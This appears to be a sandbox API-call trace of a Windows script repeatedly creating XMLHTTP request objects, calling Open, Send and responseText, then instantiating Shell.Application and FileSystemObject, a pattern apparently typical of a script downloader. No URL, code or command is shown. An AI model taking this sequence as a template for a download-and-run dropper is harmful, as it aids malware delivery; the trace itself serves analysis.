	[0439.298] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0439.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0439.298] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0439.298] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0439.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0439.298] ??2@YAPEAX_K@Z () returned 0x62f310
	[0439.298] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f310) 
	[0439.298] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0439.298] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0439.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0439.298] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0439.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0439.299] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0439.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0439.299] longjmp () 
	[0439.299] longjmp () 
	[0439.299] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0439.299] SysStringLen (param_1=0x0) returned 0x0
	[0439.299] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0439.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0439.299] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0439.299] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0439.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0439.299] ??2@YAPEAX_K@Z () returned 0x62f330
	[0439.299] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0439.299] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0439.300] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0439.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0439.300] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0439.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0439.300] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0439.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0439.300] longjmp () 
	[0439.300] longjmp () 
	[0439.300] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0439.300] SysStringLen (param_1=0x0) returned 0x0
	[0439.300] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0439.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0439.300] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0439.301] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0439.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0439.301] ??2@YAPEAX_K@Z () returned 0x62f310
	[0439.301] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f310) 
	[0439.301] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0439.301] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0439.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0439.301] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0439.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0439.301] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0439.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0439.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0439.301] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0439.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0439.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0439.632] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0439.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0439.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0439.633] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0439.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0439.633] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0439.633] SysStringLen (param_1=0x0) returned 0x0
	[0439.633] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0439.633] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0439.633] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0439.633] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0439.633] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0439.633] ??2@YAPEAX_K@Z () returned 0x62f350
	[0439.633] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0439.633] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0439.633] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0439.634] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0439.634] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0439.634] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0439.634] SysStringLen (param_1=0x0) returned 0x0
	[0439.634] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0439.636] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0439.636] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0439.636] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0439.636] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0439.636] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0439.636] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0439.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0439.995] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0439.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0439.996] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0439.996] SysStringLen (param_1=0x0) returned 0x0
	[0439.996] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0439.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0439.996] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0439.996] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0439.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0439.996] ??2@YAPEAX_K@Z () returned 0x62f310
	[0439.997] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0439.997] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0439.997] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0439.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0439.997] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0439.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0439.997] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0439.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0439.999] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0440.000] SysStringLen (param_1=0x0) returned 0x0
